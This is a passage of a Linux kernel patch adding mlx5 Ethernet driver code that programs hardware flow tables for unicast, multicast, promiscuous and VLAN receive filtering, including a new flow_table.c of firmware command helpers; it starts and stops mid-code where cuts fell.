= + (1 << MLX5E_TT_IPV4_UDP) | + (1 << MLX5E_TT_IPV4) | + 0; + break; + + case MLX5E_MC_IPV6: + ret = + (1 << MLX5E_TT_IPV6_UDP) | + (1 << MLX5E_TT_IPV6) | + 0; + break; + + case MLX5E_MC_OTHER: + ret = + (1 << MLX5E_TT_ANY) | + 0; + break; + } + + break; + + case MLX5E_ALLMULTI: + ret = + (1 << MLX5E_TT_IPV4_UDP) | + (1 << MLX5E_TT_IPV6_UDP) | + (1 << MLX5E_TT_IPV4) | + (1 << MLX5E_TT_IPV6) | + (1 << MLX5E_TT_ANY) | + 0; + break; + + default: /* MLX5E_PROMISC */ + ret = + (1 << MLX5E_TT_IPV4_TCP) | + (1 << MLX5E_TT_IPV6_TCP) | + (1 << MLX5E_TT_IPV4_UDP) | + (1 << MLX5E_TT_IPV6_UDP) | + (1 << MLX5E_TT_IPV4) | + (1 << MLX5E_TT_IPV6) | + (1 << MLX5E_TT_ANY) | + 0; + break; + } + + return ret; +} + +static int __mlx5e_add_eth_addr_rule(struct mlx5e_priv *priv, + struct mlx5e_eth_addr_info *ai, int type, + void *flow_context, void *match_criteria) +{ + u8 match_criteria_enable = 0; + void *match_value; + void *dest; + u8 *dmac; + u8 *match_criteria_dmac; + void *ft = priv->ft.main; + u32 *tirn = priv->tirn; + u32 tt_vec; + int err; + + match_value = MLX5_ADDR_OF(flow_context, flow_context, match_value); + dmac = MLX5_ADDR_OF(fte_match_param, match_value, + outer_headers.dmac_47_16); + match_criteria_dmac = MLX5_ADDR_OF(fte_match_param, match_criteria, + outer_headers.dmac_47_16); + dest = MLX5_ADDR_OF(flow_context, flow_context, destination); + + MLX5_SET(flow_context, flow_context, action, + MLX5_FLOW_CONTEXT_ACTION_FWD_DEST); + MLX5_SET(flow_context, flow_context, destination_list_size, 1); + MLX5_SET(dest_format_struct, dest, destination_type, + MLX5_FLOW_CONTEXT_DEST_TYPE_TIR); + + switch (type) { + case MLX5E_FULLMATCH: + match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + memset(match_criteria_dmac, 0xff, ETH_ALEN); + ether_addr_copy(dmac, ai->addr); + break; + + case MLX5E_ALLMULTI: + match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + match_criteria_dmac[0] = 0x01; + dmac[0] = 0x01; + break; + + case MLX5E_PROMISC: + break; + } + + tt_vec = mlx5e_get_tt_vec(ai, type); + + if (tt_vec & (1 << MLX5E_TT_ANY)) { + MLX5_SET(dest_format_struct, dest, destination_id, + tirn[MLX5E_TT_ANY]); + err = mlx5_add_flow_table_entry(ft, match_criteria_enable, + match_criteria, flow_context, + &ai->ft_ix[MLX5E_TT_ANY]); + if (err) { + mlx5e_del_eth_addr_from_flow_table(priv, ai); + return err; + } + ai->tt_vec |= (1 << MLX5E_TT_ANY); + } + + match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + MLX5_SET_TO_ONES(fte_match_param, match_criteria, + outer_headers.ethertype); + + if (tt_vec & (1 << MLX5E_TT_IPV4)) { + MLX5_SET(fte_match_param, match_value, outer_headers.ethertype, + ETH_P_IP); + MLX5_SET(dest_format_struct, dest, destination_id, + tirn[MLX5E_TT_IPV4]); + err = mlx5_add_flow_table_entry(ft, match_criteria_enable, + match_criteria, flow_context, + &ai->ft_ix[MLX5E_TT_IPV4]); + if (err) { + mlx5e_del_eth_addr_from_flow_table(priv, ai); + return err; + } + ai->tt_vec |= (1 << MLX5E_TT_IPV4); + } + + if (tt_vec & (1 << MLX5E_TT_IPV6)) { + MLX5_SET(fte_match_param, match_value, outer_headers.ethertype, + ETH_P_IPV6); + MLX5_SET(dest_format_struct, dest, destination_id, + tirn[MLX5E_TT_IPV6]); + err = mlx5_add_flow_table_entry(ft, match_criteria_enable, + match_criteria, flow_context, + &ai->ft_ix[MLX5E_TT_IPV6]); + if (err) { + mlx5e_del_eth_addr_from_flow_table(priv, ai); + return err; + } + ai->tt_vec |= (1 << MLX5E_TT_IPV6); + } + + MLX5_SET_TO_ONES(fte_match_param, match_criteria, + outer_headers.ip_protocol); + MLX5_SET(fte_match_param, match_value, outer_headers.ip_protocol, + IPPROTO_UDP); + + if (tt_vec & (1 << MLX5E_TT_IPV4_UDP)) { + MLX5_SET(fte_match_param, match_value, outer_headers.ethertype, + ETH_P_IP); + MLX5_SET(dest_format_struct, dest, destination_id, + tirn[MLX5E_TT_IPV4_UDP]); + err = mlx5_add_flow_table_entry(ft, match_criteria_enable, + match_criteria, flow_context, + &ai->ft_ix[MLX5E_TT_IPV4_UDP]); + if (err) { + mlx5e_del_eth_addr_from_flow_table(priv, ai); + return err; + } + ai->tt_vec |= (1 << MLX5E_TT_IPV4_UDP); + } + + if (tt_vec & (1 << MLX5E_TT_IPV6_UDP)) { + MLX5_SET(fte_match_param, match_value, outer_headers.ethertype, + ETH_P_IPV6); + MLX5_SET(dest_format_struct, dest, destination_id, + tirn[MLX5E_TT_IPV6_UDP]); + err = mlx5_add_flow_table_entry(ft, match_criteria_enable, + match_criteria, flow_context, + &ai->ft_ix[MLX5E_TT_IPV6_UDP]); + if (err) { + mlx5e_del_eth_addr_from_flow_table(priv, ai); + return err; + } + ai->tt_vec |= (1 << MLX5E_TT_IPV6_UDP); + } + + MLX5_SET(fte_match_param, match_value, outer_headers.ip_protocol, + IPPROTO_TCP); + + if (tt_vec & (1 << MLX5E_TT_IPV4_TCP)) { + MLX5_SET(fte_match_param, match_value, outer_headers.ethertype, + ETH_P_IP); + MLX5_SET(dest_format_struct, dest, destination_id, + tirn[MLX5E_TT_IPV4_TCP]); + err = mlx5_add_flow_table_entry(ft, match_criteria_enable, + match_criteria, flow_context, + &ai->ft_ix[MLX5E_TT_IPV4_TCP]); + if (err) { + mlx5e_del_eth_addr_from_flow_table(priv, ai); + return err; + } + ai->tt_vec |= (1 << MLX5E_TT_IPV4_TCP); + } + + if (tt_vec & (1 << MLX5E_TT_IPV6_TCP)) { + MLX5_SET(fte_match_param, match_value, outer_headers.ethertype, + ETH_P_IPV6); + MLX5_SET(dest_format_struct, dest, destination_id, + tirn[MLX5E_TT_IPV6_TCP]); + err = mlx5_add_flow_table_entry(ft, match_criteria_enable, + match_criteria, flow_context, + &ai->ft_ix[MLX5E_TT_IPV6_TCP]); + if (err) { + mlx5e_del_eth_addr_from_flow_table(priv, ai); + return err; + } + ai->tt_vec |= (1 << MLX5E_TT_IPV6_TCP); + } + + return 0; +} + +static int mlx5e_add_eth_addr_rule(struct mlx5e_priv *priv, + struct mlx5e_eth_addr_info *ai, int type) +{ + u32 *flow_context; + u32 *match_criteria; + int err; + + flow_context = mlx5_vzalloc(MLX5_ST_SZ_BYTES(flow_context) + + MLX5_ST_SZ_BYTES(dest_format_struct)); + match_criteria = mlx5_vzalloc(MLX5_ST_SZ_BYTES(fte_match_param)); + if (!flow_context || !match_criteria) { + netdev_err(priv->netdev, "%s: alloc failed\n", __func__); + err = -ENOMEM; + goto add_eth_addr_rule_out; + } + + err = __mlx5e_add_eth_addr_rule(priv, ai, type, flow_context, + match_criteria); + if (err) + netdev_err(priv->netdev, "%s: failed\n", __func__); + +add_eth_addr_rule_out: + kvfree(match_criteria); + kvfree(flow_context); + return err; +} + +enum mlx5e_vlan_rule_type { + MLX5E_VLAN_RULE_TYPE_UNTAGGED, + MLX5E_VLAN_RULE_TYPE_ANY_VID, + MLX5E_VLAN_RULE_TYPE_MATCH_VID, +}; + +static int mlx5e_add_vlan_rule(struct mlx5e_priv *priv, + enum mlx5e_vlan_rule_type rule_type, u16 vid) +{ + u8 match_criteria_enable = 0; + u32 *flow_context; + void *match_value; + void *dest; + u32 *match_criteria; + u32 *ft_ix; + int err; + + flow_context = mlx5_vzalloc(MLX5_ST_SZ_BYTES(flow_context) + + MLX5_ST_SZ_BYTES(dest_format_struct)); + match_criteria = mlx5_vzalloc(MLX5_ST_SZ_BYTES(fte_match_param)); + if (!flow_context || !match_criteria) { + netdev_err(priv->netdev, "%s: alloc failed\n", __func__); + err = -ENOMEM; + goto add_vlan_rule_out; + } + match_value = MLX5_ADDR_OF(flow_context, flow_context, match_value); + dest = MLX5_ADDR_OF(flow_context, flow_context, destination); + + MLX5_SET(flow_context, flow_context, action, + MLX5_FLOW_CONTEXT_ACTION_FWD_DEST); + MLX5_SET(flow_context, flow_context, destination_list_size, 1); + MLX5_SET(dest_format_struct, dest, destination_type, + MLX5_FLOW_CONTEXT_DEST_TYPE_FLOW_TABLE); + MLX5_SET(dest_format_struct, dest, destination_id, + mlx5_get_flow_table_id(priv->ft.main)); + + match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + MLX5_SET_TO_ONES(fte_match_param, match_criteria, + outer_headers.vlan_tag); + + switch (rule_type) { + case MLX5E_VLAN_RULE_TYPE_UNTAGGED: + ft_ix = &priv->vlan.untagged_rule_ft_ix; + break; + case MLX5E_VLAN_RULE_TYPE_ANY_VID: + ft_ix = &priv->vlan.any_vlan_rule_ft_ix; + MLX5_SET(fte_match_param, match_value, outer_headers.vlan_tag, + 1); + break; + default: /* MLX5E_VLAN_RULE_TYPE_MATCH_VID */ + ft_ix = &priv->vlan.active_vlans_ft_ix[vid]; + MLX5_SET(fte_match_param, match_value, outer_headers.vlan_tag, + 1); + MLX5_SET_TO_ONES(fte_match_param, match_criteria, + outer_headers.first_vid); + MLX5_SET(fte_match_param, match_value, outer_headers.first_vid, + vid); + break; + } + + err = mlx5_add_flow_table_entry(priv->ft.vlan, match_criteria_enable, + match_criteria, flow_context, ft_ix); + if (err) + netdev_err(priv->netdev, "%s: failed\n", __func__); + +add_vlan_rule_out: + kvfree(match_criteria); + kvfree(flow_context); + return err; +} + +static void mlx5e_del_vlan_rule(struct mlx5e_priv *priv, + enum mlx5e_vlan_rule_type rule_type, u16 vid) +{ + switch (rule_type) { + case MLX5E_VLAN_RULE_TYPE_UNTAGGED: + mlx5_del_flow_table_entry(priv->ft.vlan, + priv->vlan.untagged_rule_ft_ix); + break; + case MLX5E_VLAN_RULE_TYPE_ANY_VID: + mlx5_del_flow_table_entry(priv->ft.vlan, + priv->vlan.any_vlan_rule_ft_ix); + break; + case MLX5E_VLAN_RULE_TYPE_MATCH_VID: + mlx5_del_flow_table_entry(priv->ft.vlan, + priv->vlan.active_vlans_ft_ix[vid]); + break; + } +} + +void mlx5e_enable_vlan_filter(struct mlx5e_priv *priv) +{ + WARN_ON(!mutex_is_locked(&priv->state_lock)); + + if (priv->vlan.filter_disabled) { + priv->vlan.filter_disabled = false; + if (test_bit(MLX5E_STATE_OPENED, &priv->state)) + mlx5e_del_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_ANY_VID, + 0); + } +} + +void mlx5e_disable_vlan_filter(struct mlx5e_priv *priv) +{ + WARN_ON(!mutex_is_locked(&priv->state_lock)); + + if (!priv->vlan.filter_disabled) { + priv->vlan.filter_disabled = true; + if (test_bit(MLX5E_STATE_OPENED, &priv->state)) + mlx5e_add_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_ANY_VID, + 0); + } +} + +int mlx5e_vlan_rx_add_vid(struct net_device *dev, __always_unused __be16 proto, + u16 vid) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + int err = 0; + + mutex_lock(&priv->state_lock); + + set_bit(vid, priv->vlan.active_vlans); + if (test_bit(MLX5E_STATE_OPENED, &priv->state)) + err = mlx5e_add_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_MATCH_VID, + vid); + + mutex_unlock(&priv->state_lock); + + return err; +} + +int mlx5e_vlan_rx_kill_vid(struct net_device *dev, __always_unused __be16 proto, + u16 vid) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + + mutex_lock(&priv->state_lock); + + clear_bit(vid, priv->vlan.active_vlans); + if (test_bit(MLX5E_STATE_OPENED, &priv->state)) + mlx5e_del_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_MATCH_VID, vid); + + mutex_unlock(&priv->state_lock); + + return 0; +} + +int mlx5e_add_all_vlan_rules(struct mlx5e_priv *priv) +{ + u16 vid; + int err; + + for_each_set_bit(vid, priv->vlan.active_vlans, VLAN_N_VID) { + err = mlx5e_add_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_MATCH_VID, + vid); + if (err) + return err; + } + + err = mlx5e_add_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_UNTAGGED, 0); + if (err) + return err; + + if (priv->vlan.filter_disabled) { + err = mlx5e_add_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_ANY_VID, + 0); + if (err) + return err; + } + + return 0; +} + +void mlx5e_del_all_vlan_rules(struct mlx5e_priv *priv) +{ + u16 vid; + + if (priv->vlan.filter_disabled) + mlx5e_del_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_ANY_VID, 0); + + mlx5e_del_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_UNTAGGED, 0); + + for_each_set_bit(vid, priv->vlan.active_vlans, VLAN_N_VID) + mlx5e_del_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_MATCH_VID, vid); +} + +#define mlx5e_for_each_hash_node(hn, tmp, hash, i) \ + for (i = 0; i < MLX5E_ETH_ADDR_HASH_SIZE; i++) \ + hlist_for_each_entry_safe(hn, tmp, &hash[i], hlist) + +static void mlx5e_execute_action(struct mlx5e_priv *priv, + struct mlx5e_eth_addr_hash_node *hn) +{ + switch (hn->action) { + case MLX5E_ACTION_ADD: + mlx5e_add_eth_addr_rule(priv, &hn->ai, MLX5E_FULLMATCH); + hn->action = MLX5E_ACTION_NONE; + break; + + case MLX5E_ACTION_DEL: + mlx5e_del_eth_addr_from_flow_table(priv, &hn->ai); + mlx5e_del_eth_addr_from_hash(hn); + break; + } +} + +static void mlx5e_sync_netdev_addr(struct mlx5e_priv *priv) +{ + struct net_device *netdev = priv->netdev; + struct netdev_hw_addr *ha; + + netif_addr_lock_bh(netdev); + + mlx5e_add_eth_addr_to_hash(priv->eth_addr.netdev_uc, + priv->netdev->dev_addr); + + netdev_for_each_uc_addr(ha, netdev) + mlx5e_add_eth_addr_to_hash(priv->eth_addr.netdev_uc, ha->addr); + + netdev_for_each_mc_addr(ha, netdev) + mlx5e_add_eth_addr_to_hash(priv->eth_addr.netdev_mc, ha->addr); + + netif_addr_unlock_bh(netdev); +} + +static void mlx5e_apply_netdev_addr(struct mlx5e_priv *priv) +{ + struct mlx5e_eth_addr_hash_node *hn; + struct hlist_node *tmp; + int i; + + mlx5e_for_each_hash_node(hn, tmp, priv->eth_addr.netdev_uc, i) + mlx5e_execute_action(priv, hn); + + mlx5e_for_each_hash_node(hn, tmp, priv->eth_addr.netdev_mc, i) + mlx5e_execute_action(priv, hn); +} + +static void mlx5e_handle_netdev_addr(struct mlx5e_priv *priv) +{ + struct mlx5e_eth_addr_hash_node *hn; + struct hlist_node *tmp; + int i; + + mlx5e_for_each_hash_node(hn, tmp, priv->eth_addr.netdev_uc, i) + hn->action = MLX5E_ACTION_DEL; + mlx5e_for_each_hash_node(hn, tmp, priv->eth_addr.netdev_mc, i) + hn->action = MLX5E_ACTION_DEL; + + if (test_bit(MLX5E_STATE_OPENED, &priv->state)) + mlx5e_sync_netdev_addr(priv); + + mlx5e_apply_netdev_addr(priv); +} + +void mlx5e_set_rx_mode_core(struct mlx5e_priv *priv) +{ + struct mlx5e_eth_addr_db *ea = &priv->eth_addr; + struct net_device *ndev = priv->netdev; + + bool rx_mode_enable = test_bit(MLX5E_STATE_OPENED, &priv->state); + bool promisc_enabled = rx_mode_enable && (ndev->flags & IFF_PROMISC); + bool allmulti_enabled = rx_mode_enable && (ndev->flags & IFF_ALLMULTI); + bool broadcast_enabled = rx_mode_enable; + + bool enable_promisc = !ea->promisc_enabled && promisc_enabled; + bool disable_promisc = ea->promisc_enabled && !promisc_enabled; + bool enable_allmulti = !ea->allmulti_enabled && allmulti_enabled; + bool disable_allmulti = ea->allmulti_enabled && !allmulti_enabled; + bool enable_broadcast = !ea->broadcast_enabled && broadcast_enabled; + bool disable_broadcast = ea->broadcast_enabled && !broadcast_enabled; + + if (enable_promisc) + mlx5e_add_eth_addr_rule(priv, &ea->promisc, MLX5E_PROMISC); + if (enable_allmulti) + mlx5e_add_eth_addr_rule(priv, &ea->allmulti, MLX5E_ALLMULTI); + if (enable_broadcast) + mlx5e_add_eth_addr_rule(priv, &ea->broadcast, MLX5E_FULLMATCH); + + mlx5e_handle_netdev_addr(priv); + + if (disable_broadcast) + mlx5e_del_eth_addr_from_flow_table(priv, &ea->broadcast); + if (disable_allmulti) + mlx5e_del_eth_addr_from_flow_table(priv, &ea->allmulti); + if (disable_promisc) + mlx5e_del_eth_addr_from_flow_table(priv, &ea->promisc); + + ea->promisc_enabled = promisc_enabled; + ea->allmulti_enabled = allmulti_enabled; + ea->broadcast_enabled = broadcast_enabled; +} + +void mlx5e_set_rx_mode_work(struct work_struct *work) +{ + struct mlx5e_priv *priv = container_of(work, struct mlx5e_priv, + set_rx_mode_work); + + mutex_lock(&priv->state_lock); + if (test_bit(MLX5E_STATE_OPENED, &priv->state)) + mlx5e_set_rx_mode_core(priv); + mutex_unlock(&priv->state_lock); +} + +void mlx5e_init_eth_addr(struct mlx5e_priv *priv) +{ + ether_addr_copy(priv->eth_addr.broadcast.addr, priv->netdev->broadcast); +} + +static int mlx5e_create_main_flow_table(struct mlx5e_priv *priv) +{ + struct mlx5_flow_table_group *g; + u8 *dmac; + + g = kcalloc(9, sizeof(*g), GFP_KERNEL); + + g[0].log_sz = 2; + g[0].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + MLX5_SET_TO_ONES(fte_match_param, g[0].match_criteria, + outer_headers.ethertype); + MLX5_SET_TO_ONES(fte_match_param, g[0].match_criteria, + outer_headers.ip_protocol); + + g[1].log_sz = 1; + g[1].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + MLX5_SET_TO_ONES(fte_match_param, g[1].match_criteria, + outer_headers.ethertype); + + g[2].log_sz = 0; + + g[3].log_sz = 14; + g[3].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + dmac = MLX5_ADDR_OF(fte_match_param, g[3].match_criteria, + outer_headers.dmac_47_16); + memset(dmac, 0xff, ETH_ALEN); + MLX5_SET_TO_ONES(fte_match_param, g[3].match_criteria, + outer_headers.ethertype); + MLX5_SET_TO_ONES(fte_match_param, g[3].match_criteria, + outer_headers.ip_protocol); + + g[4].log_sz = 13; + g[4].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + dmac = MLX5_ADDR_OF(fte_match_param, g[4].match_criteria, + outer_headers.dmac_47_16); + memset(dmac, 0xff, ETH_ALEN); + MLX5_SET_TO_ONES(fte_match_param, g[4].match_criteria, + outer_headers.ethertype); + + g[5].log_sz = 11; + g[5].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + dmac = MLX5_ADDR_OF(fte_match_param, g[5].match_criteria, + outer_headers.dmac_47_16); + memset(dmac, 0xff, ETH_ALEN); + + g[6].log_sz = 2; + g[6].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + dmac = MLX5_ADDR_OF(fte_match_param, g[6].match_criteria, + outer_headers.dmac_47_16); + dmac[0] = 0x01; + MLX5_SET_TO_ONES(fte_match_param, g[6].match_criteria, + outer_headers.ethertype); + MLX5_SET_TO_ONES(fte_match_param, g[6].match_criteria, + outer_headers.ip_protocol); + + g[7].log_sz = 1; + g[7].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + dmac = MLX5_ADDR_OF(fte_match_param, g[7].match_criteria, + outer_headers.dmac_47_16); + dmac[0] = 0x01; + MLX5_SET_TO_ONES(fte_match_param, g[7].match_criteria, + outer_headers.ethertype); + + g[8].log_sz = 0; + g[8].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + dmac = MLX5_ADDR_OF(fte_match_param, g[8].match_criteria, + outer_headers.dmac_47_16); + dmac[0] = 0x01; + priv->ft.main = mlx5_create_flow_table(priv->mdev, 1, + MLX5_FLOW_TABLE_TYPE_NIC_RCV, + 9, g); + kfree(g); + + return priv->ft.main ? 0 : -ENOMEM; +} + +static void mlx5e_destroy_main_flow_table(struct mlx5e_priv *priv) +{ + mlx5_destroy_flow_table(priv->ft.main); +} + +static int mlx5e_create_vlan_flow_table(struct mlx5e_priv *priv) +{ + struct mlx5_flow_table_group *g; + + g = kcalloc(2, sizeof(*g), GFP_KERNEL); + if (!g) + return -ENOMEM; + + g[0].log_sz = 12; + g[0].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + MLX5_SET_TO_ONES(fte_match_param, g[0].match_criteria, + outer_headers.vlan_tag); + MLX5_SET_TO_ONES(fte_match_param, g[0].match_criteria, + outer_headers.first_vid); + + /* untagged + any vlan id */ + g[1].log_sz = 1; + g[1].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + MLX5_SET_TO_ONES(fte_match_param, g[1].match_criteria, + outer_headers.vlan_tag); + + priv->ft.vlan = mlx5_create_flow_table(priv->mdev, 0, + MLX5_FLOW_TABLE_TYPE_NIC_RCV, + 2, g); + + kfree(g); + return priv->ft.vlan ? 0 : -ENOMEM; +} + +static void mlx5e_destroy_vlan_flow_table(struct mlx5e_priv *priv) +{ + mlx5_destroy_flow_table(priv->ft.vlan); +} + +int mlx5e_open_flow_table(struct mlx5e_priv *priv) +{ + int err; + + err = mlx5e_create_main_flow_table(priv); + if (err) + return err; + + err = mlx5e_create_vlan_flow_table(priv); + if (err) + goto err_destroy_main_flow_table; + + return 0; + +err_destroy_main_flow_table: + mlx5e_destroy_main_flow_table(priv); + + return err; +} + +void mlx5e_close_flow_table(struct mlx5e_priv *priv) +{ + mlx5e_destroy_vlan_flow_table(priv); + mlx5e_destroy_main_flow_table(priv); +} diff --git a/drivers/net/ethernet/mellanox/mlx5/core/flow_table.c b/drivers/net/ethernet/mellanox/mlx5/core/flow_table.c new file mode 100644 index 000000000000..ca90b9bc3b95 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/flow_table.c @@ -0,0 +1,422 @@ +/* + * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#include +#include +#include +#include "mlx5_core.h" + +struct mlx5_ftg { + struct mlx5_flow_table_group g; + u32 id; + u32 start_ix; +}; + +struct mlx5_flow_table { + struct mlx5_core_dev *dev; + u8 level; + u8 type; + u32 id; + struct mutex mutex; /* sync bitmap alloc */ + u16 num_groups; + struct mlx5_ftg *group; + unsigned long *bitmap; + u32 size; +}; + +static int mlx5_set_flow_entry_cmd(struct mlx5_flow_table *ft, u32 group_ix, + u32 flow_index, void *flow_context) +{ + u32 out[MLX5_ST_SZ_DW(set_fte_out)]; + u32 *in; + void *in_flow_context; + int fcdls = + MLX5_GET(flow_context, flow_context, destination_list_size) * + MLX5_ST_SZ_BYTES(dest_format_struct); + int inlen = MLX5_ST_SZ_BYTES(set_fte_in) + fcdls; + int err; + + in = mlx5_vzalloc(inlen); + if (!in) { + mlx5_core_warn(ft->dev, "failed to allocate inbox\n"); + return -ENOMEM; + } + + MLX5_SET(set_fte_in, in, table_type, ft->type); + MLX5_SET(set_fte_in, in, table_id, ft->id); + MLX5_SET(set_fte_in, in, flow_index, flow_index); + MLX5_SET(set_fte_in, in, opcode, MLX5_CMD_OP_SET_FLOW_TABLE_ENTRY); + + in_flow_context = MLX5_ADDR_OF(set_fte_in, in, flow_context); + memcpy(in_flow_context, flow_context, + MLX5_ST_SZ_BYTES(flow_context) + fcdls); + + MLX5_SET(flow_context, in_flow_context, group_id, + ft->group[group_ix].id); + + memset(out, 0, sizeof(out)); + err = mlx5_cmd_exec_check_status(ft->dev, in, inlen, out, + sizeof(out)); + kvfree(in); + + return err; +} + +static void mlx5_del_flow_entry_cmd(struct mlx5_flow_table *ft, u32 flow_index) +{ + u32 in[MLX5_ST_SZ_DW(delete_fte_in)]; + u32 out[MLX5_ST_SZ_DW(delete_fte_out)]; + + memset(in, 0, sizeof(in)); + memset(out, 0, sizeof(out)); + +#define MLX5_SET_DFTEI(p, x, v) MLX5_SET(delete_fte_in, p, x, v) + MLX5_SET_DFTEI(in, table_type, ft->type); + MLX5_SET_DFTEI(in, table_id, ft->id); + MLX5_SET_DFTEI(in, flow_index, flow_index); + MLX5_SET_DFTEI(in, opcode, MLX5_CMD_OP_DELETE_FLOW_TABLE_ENTRY); + + mlx5_cmd_exec_check_status(ft->dev, in, sizeof(in), out, sizeof(out)); +} + +static void mlx5_destroy_flow_group_cmd(struct mlx5_flow_table *ft, int i) +{ + u32 in[MLX5_ST_SZ_DW(destroy_flow_group_in)]; + u32 out[MLX5_ST_SZ_DW(destroy_flow_group_out)]; + + memset(in, 0, sizeof(in)); + memset(out, 0, sizeof(out)); + +#define MLX5_SET_DFGI(p, x, v) MLX5_SET(destroy_flow_group_in, p, x, v) + MLX5_SET_DFGI(in, table_type, ft->type); + MLX5_SET_DFGI(in, table_id, ft->id); + MLX5_SET_DFGI(in, opcode, MLX5_CMD_OP_DESTROY_FLOW_GROUP); + MLX5_SET_DFGI(in, group_id, ft->group[i].id); + mlx5_cmd_exec_check_status(ft->dev, in, sizeof(in), out, sizeof(out)); +} + +static int mlx5_create_flow_group_cmd(struct mlx5_flow_table *ft, int i) +{ + u32 out[MLX5_ST_SZ_DW(create_flow_group_out)]; + u32 *in; + void *in_match_criteria; + int inlen = MLX5_ST_SZ_BYTES(create_flow_group_in); + struct mlx5_flow_table_group *g = &ft->group[i].g; + u32 start_ix = ft->group[i].start_ix; + u32 end_ix = start_ix + (1 << g->log_sz) - 1; + int err; + + in = mlx5_vzalloc(inlen); + if (!in) { + mlx5_core_warn(ft->dev, "failed to allocate inbox\n"); + return -ENOMEM; + } + in_match_criteria = MLX5_ADDR_OF(create_flow_group_in, in, + match_criteria); + + memset(out, 0, sizeof(out)); + +#define MLX5_SET_CFGI(p, x, v) MLX5_SET(create_flow_group_in, p, x, v) + MLX5_SET_CFGI(in, table_type, ft->type); + MLX5_SET_CFGI(in, table_id, ft->id); + MLX5_SET_CFGI(in, opcode, MLX5_CMD_OP_CREATE_FLOW_GROUP); + MLX5_SET_CFGI(in, start_flow_index, start_ix); + MLX5_SET_CFGI(in, end_flow_index, end_ix); + MLX5_SET_CFGI(in, match_criteria_enable, g->match_criteria_enable); + + memcpy(in_match_criteria, g->match_criteria, + MLX5_ST_SZ_BYTES(fte_match_param)); + + err = mlx5_cmd_exec_check_status(ft->dev, in, inlen, out, + sizeof(out)); + if (!err) + ft->group[i].id = MLX5_GET(create_flow_group_out, out, + group_id); + + kvfree(in); + + return err; +} + +static void mlx5_destroy_flow_table_groups(struct mlx5_flow_table *ft) +{ + int i; + + for (i = 0; i < ft->num_groups; i++) + mlx5_destroy_flow_group_cmd(ft, i); +} + +static int mlx5_create_flow_table_groups(struct mlx5_flow_table *ft) +{ + int err; + int i; + + for (i = 0; i < ft->num_groups; i++) { + err = mlx5_create_flow_group_cmd(ft, i); + if (err) + goto err_destroy_flow_table_groups; + } + + return 0; + +err_destroy_flow_table_groups: + for (i--; i >= 0; i--) + mlx5_destroy_flow_group_cmd(ft, i); + + return err; +} + +static int mlx5_create_flow_table_cmd(struct mlx5_flow_table *ft) +{ + u32 in[MLX5_ST_SZ_DW(create_flow_table_in)]; + u32 out[MLX5_ST_SZ_DW(create_flow_table_out)]; + int err; + + memset(in, 0, sizeof(in)); + + MLX5_SET(create_flow_table_in, in, table_type, ft->type); + MLX5_SET(create_flow_table_in, in, level, ft->level); + MLX5_SET(create_flow_table_in, in, log_size, order_base_2(ft->size)); + + MLX5_SET(create_flow_table_in, in, opcode, + MLX5_CMD_OP_CREATE_FLOW_TABLE); + + memset(out, 0, sizeof(out)); + err = mlx5_cmd_exec_check_status(ft->dev, in, sizeof(in), out, + sizeof(out)); + if (err) + return err; + + ft->id = MLX5_GET(create_flow_table_out, out, table_id); + + return 0; +} + +static void mlx5_destroy_flow_table_cmd(struct mlx5_flow_table *ft) +{ + u32 in[MLX5_ST_SZ_DW(destroy_flow_table_in)]; + u32 out[MLX5_ST_SZ_DW(destroy_flow_table_out)]; + + memset(in, 0, sizeof(in)); + memset(out, 0, sizeof(out)); + +#define MLX5_SET_DFTI(p, x, v) MLX5_SET(destroy_flow_table_in, p, x, v) + MLX5_SET_DFTI(in, table_type, ft->type); + MLX5_SET_DFTI(in, table_id, ft->id); + MLX5_SET_DFTI(in, opcode, MLX5_CMD_OP_DESTROY_FLOW_TABLE); + + mlx5_cmd_exec_check_status(ft->dev, in, sizeof(in), out, sizeof(out)); +} + +static int mlx5_find_group(struct mlx5_flow_table *ft, u8 match_criteria_enable, + u32 